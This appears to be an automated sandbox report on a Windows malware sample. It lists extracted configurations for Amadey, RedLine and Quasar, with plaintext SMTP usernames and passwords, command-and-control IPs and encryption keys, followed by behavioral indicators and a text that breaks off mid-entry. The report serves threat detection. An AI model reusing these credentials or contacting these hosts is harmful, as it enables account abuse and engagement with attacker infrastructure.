Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
31-07-2024 03:56
Static task
static1
Behavioral task
behavioral1
Sample
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe
Resource
win10v2004-20240730-en
General
-
Target
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe
-
Size
1.8MB
-
MD5
f84c467d7176648368090a12c87f0161
-
SHA1
7126e1c0347b3300592ba1a1a81385d6240174f7
-
SHA256
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e
-
SHA512
839aec9230a202cdce5a6c254b4792bf53ba4a087a160b743d4d7c69df95a369ef8384fc4558556eaa4cdab83c897110da0844ba02fa7f539890c078dc555dc9
-
SSDEEP
49152:I2J0VkjJgpxf0gNrI2z02qFFx3Ef19lPmnSEsZBXpiD7xtKcJU4aHDD:I2JIzpxsgNsB2O3SDcSZZem/4Sf
Malware Config
Extracted
Protocol: smtp- Host:
mx.websitebod.com - Port:
587 - Username:
[email protected] - Password:
B396wbiaBS
Extracted
Protocol: smtp- Host:
smtp.netzero.com - Port:
587 - Username:
[email protected] - Password:
Neuter1
Extracted
Protocol: smtp- Host:
mx.nikeshoesoutletforsale.com - Port:
587 - Username:
[email protected] - Password:
Po57av9jxy
Extracted
Protocol: smtp- Host:
smtp.frontiernet.net - Port:
587 - Username:
[email protected] - Password:
phone27466
Extracted
Protocol: smtp- Host:
smtp.epix.net - Port:
587 - Username:
[email protected] - Password:
tellis
Extracted
amadey
4.41
0657d1
http://185.215.113.19
-
install_dir
0d8f5eb8a7
-
install_file
explorti.exe
-
strings_key
6c55a5f34bb433fbd933a168577b1838
-
url_paths
/Vi9leo/index.php
Extracted
amadey
4.41
fed3aa
http://185.215.113.16
-
install_dir
44111dbc49
-
install_file
axplong.exe
-
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
-
url_paths
/Jo89Ku7d/index.php
Extracted
redline
exodusmarket.io
91.92.240.111:1334
Extracted
quasar
1.4.1
Office04
51.222.21.20:4782
374acc94-a8cd-45c6-bc31-752e0f83541d
-
encryption_key
5B2A5F50FABB3F6748116D7077D95758D0DFFC77
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\adada.exe family_quasar behavioral1/memory/5072-7686-0x0000000000110000-0x0000000000434000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/7128-596-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SectopRAT payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/7128-596-0x0000000000400000-0x000000000041E000-memory.dmp family_sectoprat -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
axplong.exeaxplong.exeexplorti.exeexplorti.exeaxplong.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exec5d6d3a173.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c5d6d3a173.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorti.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exec5d6d3a173.exeaxplong.exeaxplong.exeexplorti.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c5d6d3a173.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c5d6d3a173.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
explorti.exe73b79a2459.exec5d6d3a173.exeaxplong.exeRegAsm.exedropperrr.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exejsawdtyjde.execlamer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation explorti.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation 73b79a2459.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation c5d6d3a173.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation axplong.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation dropperrr.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation jsawdtyjde.exe Key value queried \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Control Panel\International\Geo\Nation clamer.exe -
Executes dropped EXE 23 IoCs
Processes:
explorti.exe73b79a2459.exe84743dcfde.exec5d6d3a173.exeaxplong.exejsawdtyjde.execlamer.exedeepweb.exethkdh.exeaxplong.exeexplorti.exeagpphek.exepureee.exeadada.exedropperrr.exesvchost.exeexplorti.exeaxplong.exepython_x86_Lib.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exepid process 2144 explorti.exe 4824 73b79a2459.exe 6056 84743dcfde.exe 5680 c5d6d3a173.exe 6328 axplong.exe 6696 jsawdtyjde.exe 6884 clamer.exe 6980 deepweb.exe 7080 thkdh.exe 6176 axplong.exe 664 explorti.exe 7024 agpphek.exe 6712 pureee.exe 5072 adada.exe 4048 dropperrr.exe 7036 svchost.exe 7920 explorti.exe 7916 axplong.exe 8188 python_x86_Lib.exe 6896 ITSMService.exe 7240 ITSMAgent.exe 2380 ITSMAgent.exe 4080 ITSMAgent.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
c5d6d3a173.exeaxplong.exeaxplong.exeexplorti.exeexplorti.exeaxplong.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine c5d6d3a173.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key opened \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\Software\Wine explorti.exe -
Loads dropped DLL 62 IoCs
Processes:
MsiExec.exeMsiExec.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exepid process 6920 MsiExec.exe 6920 MsiExec.exe 6920 MsiExec.exe 6920 MsiExec.exe 7824 MsiExec.exe 7824 MsiExec.exe 7824 MsiExec.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 6896 ITSMService.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 2380 ITSMAgent.exe 2380 ITSMAgent.exe 2380 ITSMAgent.exe 2380 ITSMAgent.exe 2380 ITSMAgent.exe 2380 ITSMAgent.exe 7240 ITSMAgent.exe 2380 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 7240 ITSMAgent.exe 4080 ITSMAgent.exe 4080 ITSMAgent.exe 7824 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
explorti.exemsiexec.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73b79a2459.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\73b79a2459.exe" explorti.exe Set value (str) \REGISTRY\USER\S-1-5-21-2721909339-1374969515-2476821579-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84743dcfde.exe = "C:\\Users\\Admin\\1000029002\\84743dcfde.exe" explorti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\COMODO\\Endpoint Manager\\ITSMAgent.exe" msiexec.exe -
Blocklisted process makes network request 2 IoCs
Processes:
msiexec.exeflow pid process 234 5684 msiexec.exe 236 5684 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe -
Drops file in System32 directory 2 IoCs
Processes:
chrome.exedescription ioc process File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF chrome.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exeexplorti.exe84743dcfde.exec5d6d3a173.exeaxplong.exeaxplong.exeexplorti.exeexplorti.exeaxplong.exepid process 3892 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe 2144 explorti.exe 6056 84743dcfde.exe 5680 c5d6d3a173.exe 6328 axplong.exe 6176 axplong.exe 664 explorti.exe 7920 explorti.exe 7916 axplong.exe -
Suspicious use of SetThreadContext 15 IoCs
Processes:
deepweb.exepureee.exedescription pid process target process PID 6980 set thread context of 7128 6980 deepweb.exe RegAsm.exe PID 6712 set thread context of 2296 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7468 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 6824 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7344 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7156 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7668 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7888 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 8148 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 6832 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 2112 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 1156 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7432 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 3296 6712 pureee.exe AddInProcess.exe PID 6712 set thread context of 7072 6712 pureee.exe AddInProcess.exe -
Drops file in Program Files directory 64 IoCs
Processes:
python_x86_Lib.exemsiexec.exedescription ioc process File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\cookielib.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\command\bdist_wininst.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Mariehamn python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xmllib.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\cachecontrol\wrapper.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\Mendoza python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Metlakatla python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Antarctica\McMurdo python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Hebron python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Etc\GMT+4 python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\dumbdbm.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\nl.msg python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Fakaofo python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\ctypes\macholib\framework.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\fixes\fix_reduce.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\lib2to3\Grammar.txt python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Brazzaville python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\widget python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\comdlg.tcl python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\__init__.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\smtplib.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\distlib\database.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\__init__.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\_implementation.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\__init__.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pkgIndex.tcl python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\Shell.tcl python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\_markerlib python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-highlight.def python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\ttk\combobox.tcl python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\urllib3\packages\ssl_match_hostname\__init__.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\toolbar.tcl python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\setuptools\command\launcher manifest.xml python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Indiana\Vincennes python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\aniwave.tcl python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tk8.5\demos\plot.tcl python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kok_in.msg python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\CObjView.tcl python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\virtualprinter\rcvirtualprintdriver.cat msiexec.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\idlelib\config-keys.def python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\sanitizer.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Argentina\ComodRivadavia python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Grand_Turk python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\samples\Control.tcl python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\distutils\archive_util.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\mailcap.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\cp949prober.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\kw.msg python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Belgrade python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\xml\sax\expatreader.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\bsddb\dbrecio.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip-7.1.2.dist-info\WHEEL python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\utils\ui.py python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\sunaudio.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Galapagos python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\pref\TK.csc python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Samarkand python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\_vendor\packaging\_compat.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\site-packages\pip\__main__.py python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\encoding\cp737.enc python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\msgs\ro.msg python_x86_Lib.exe File created C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tcl8.5\tzdata\America\Cayman python_x86_Lib.exe File opened for modification C:\Program Files (x86)\COMODO\Endpoint Manager\Lib\tix8.4.3\demos\tixwidgets.tcl python_x86_Lib.exe -
Drops file in Windows directory 22 IoCs
Processes:
msiexec.exeMsiExec.exethkdh.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exec5d6d3a173.exedescription ioc process File opened for modification C:\Windows\Installer\MSIE9BA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEC3F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF17F.tmp msiexec.exe File created C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico msiexec.exe File created C:\Windows\Installer\e59e72c.msi msiexec.exe File opened for modification C:\Windows\Installer\e59e72a.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{373FFE70-5FF7-492D-A2F4-0C6A15D8D503} msiexec.exe File created C:\Windows\Installer\wix{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\MSIF1FD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB55.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI26B.tmp msiexec.exe File created C:\Windows\Installer\e59e72a.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Tasks\Test Task17.job thkdh.exe File opened for modification C:\Windows\Installer\MSIEA09.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIEB91.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEBFF.tmp msiexec.exe File opened for modification C:\Windows\Installer\{373FFE70-5FF7-492D-A2F4-0C6A15D8D503}\icon.ico msiexec.exe File created C:\Windows\Tasks\explorti.job 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe File created C:\Windows\Tasks\axplong.job c5d6d3a173.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 6284 6056 WerFault.exe 84743dcfde.exe -
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
explorti.exe84743dcfde.exeMsiExec.exeMsiExec.exeITSMService.exe73b79a2459.exec5d6d3a173.exeRegAsm.execmd.exeITSMAgent.exeaxplong.exethkdh.exeagpphek.exedropperrr.execmd.exepython_x86_Lib.exe5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exedeepweb.exeITSMAgent.exeITSMAgent.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorti.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84743dcfde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITSMService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 73b79a2459.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c5d6d3a173.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITSMAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language thkdh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language agpphek.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dropperrr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language python_x86_Lib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d8088a0a17b246489c5804ef0760c6acedcdae822584b8ad8eb26ee020f7a1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language deepweb.exe Key 